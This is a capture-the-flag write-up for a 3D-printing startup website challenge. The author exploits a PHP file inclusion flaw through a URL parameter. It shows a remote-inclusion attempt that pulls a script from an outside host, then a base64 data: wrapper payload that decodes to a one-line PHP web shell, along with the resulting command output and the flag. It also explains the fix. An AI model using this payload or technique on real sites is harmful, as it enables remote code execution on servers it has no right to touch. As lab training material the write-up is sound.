3D Industry is a freshly launched startup specializing in 3D printing. The CEO has some doubts about the secure development of the website. Can you prove to him that his doubts are well-founded?
We're facing a website with a single entry point: index.php.
Each page is loaded through the GET parameter file:
- services.php
- creations.php
- contact.php
The first thing to try is a Local File Inclusion (LFI) using the php://filter wrapper to read the source of the included pages, but without success:
https://3d-industry.santhacklaus.xyz/index.php?file=php://filter/convert.base64-encode/resource=services.php
Second try is a Remote File Inclusion (RFI), still nothing:
https://3d-industry.santhacklaus.xyz/index.php?file=https://tapz.eu/evil_script.txt
After searching on the Internet, I came across a technique to obtain Remote Code Execution (RCE), still using a wrapper: the data: wrapper, which makes include() execute a payload carried in the URL itself.
https://3d-industry.santhacklaus.xyz/index.php?file=data:text/plain;base64,PD9waHAgZWNobyhzaGVsbF9leGVjKCRfR0VUWydjbWQnXSkpOw==&cmd=id
The base64-encoded string is a small script that executes the command passed in the GET parameter cmd:
<?php echo(shell_exec($_GET['cmd']));
Like a URL include, the data: wrapper only works when allow_url_include is On, but unlike the RFI attempt it needs no outbound connection from the server, which is why it can succeed where fetching a remote script fails. The script is executed, and we're now able to run commands on the server. What makes all of this possible is that index.php hands the file parameter straight to include(); restricting it to an allowlist of page names (and leaving allow_url_include off) would close the LFI, RFI and data: variants alike.
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls -la
total 68
dr-xr-xr-x 8 1001 1001 4096 Dec 12 08:33 .
drwxr-xr-x 1 root root 4096 Dec 14 19:15 ..
-r-xr-xr-x 1 1001 1001 8196 Dec 12 08:33 .DS_Store
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 .hidden
-r-xr-xr-x 1 1001 1001 267 Dec 12 08:33 accueil.php
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 admin
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 config
-r-xr-xr-x 1 1001 1001 448 Dec 12 08:33 contact.php
-r-xr-xr-x 1 1001 1001 996 Dec 12 08:33 creations.php
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 inc
-r-xr-xr-x 1 1001 1001 580 Dec 12 08:33 index.php
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 lang
-r-xr-xr-x 1 1001 1001 125 Dec 12 08:33 lang.php
-r-xr-xr-x 1 1001 1001 461 Dec 12 08:33 services.php
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 style
$ ls -la .hidden
total 20
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 .
dr-xr-xr-x 8 1001 1001 4096 Dec 12 08:33 ..
-r-xr-xr-x 1 1001 1001 6148 Dec 12 08:33 .DS_Store
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 this
[..]
$ ls -la .hidden/this/is/the/path/to/the/flag/
total 12
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 .
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 ..
-r-xr-xr-x 1 1001 1001 70 Dec 12 08:33 flag.txt
$ cat .hidden/this/is/the/path/to/the/flag/flag.txt
Well done ! You can validate with the flag:
IMTLD{B3w4r30fURL1nclud3}